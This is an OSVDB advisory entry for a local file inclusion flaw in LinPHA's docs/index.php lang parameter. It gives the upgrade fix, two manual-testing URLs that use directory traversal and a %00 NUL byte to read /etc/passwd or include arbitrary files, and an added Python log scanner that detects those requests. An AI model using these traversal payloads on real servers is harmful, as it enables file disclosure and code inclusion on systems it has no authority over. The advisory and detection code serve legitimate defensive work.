LinPHA index.php lang Variable Local File Inclusion

ID OSVDB:23112
Type osvdb
Reporter OSVDB
Modified 2006-02-11T08:02:40


Technical Description

The ability to include non-PHP files is present only when the PHP option magic_quotes_gpc is 'off' (with it on, PHP escapes the NUL byte that the %00 request under Manual Testing Notes depends on).

Solution Description

Upgrade to version 1.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[host]/docs/index.php?lang=/../../../../../../../../arbitrary.php
http://[target]/[host]/docs/index.php?lang=/../../../../../../../../etc/passwd%00
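
A log check for the two request shapes listed above, as an added example that is not part of the OSVDB entry or of LinPHA's code. It flags docs/index.php requests whose decoded lang value carries a traversal segment, a leading slash or a NUL byte. The log format, the /linpha/ install path, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: access log in Apache/nginx "combined"-style format.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def classify_lang(request_target):
    """Return findings for the lang parameter of a docs/index.php request."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/docs/index.php"):
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != "lang":
            continue
        # parse_qsl has already percent-decoded the value, so %00 is "\x00".
        path = value.replace("\\", "/")
        if "\x00" in value:
            findings.append("null-byte")
        if ".." in path.split("/"):
            findings.append("traversal")
        if path.startswith("/"):
            findings.append("absolute-path")
    return findings

def scan(lines):
    """Return (line number, findings) for every suspicious request line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify_lang(match.group(1)) if match else []
        if findings:
            hits.append((lineno, findings))
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Feb/2006:08:02:40 +0000] "GET /linpha/docs/index.php?lang=german HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Feb/2006:08:03:01 +0000] "GET /linpha/docs/index.php?lang=/../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '198.51.100.7 - - [11/Feb/2006:08:03:05 +0000] "GET /linpha/docs/index.php?lang=/../../../../../../../../arbitrary.php HTTP/1.1" 200 312',
    '192.0.2.10 - - [11/Feb/2006:08:04:12 +0000] "GET /linpha/index.php?lang=../x HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

The last sample line is not reported because the check is scoped to docs/index.php, the script this entry covers.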


Secunia Advisory ID: 18808
Related OSVDB ID: 23113
Related OSVDB ID: 23115
Related OSVDB ID: 23114
Related OSVDB ID: 23116
FrSIRT Advisory: ADV-2006-0535
CVE-2006-0713
Bugtraq ID: 16592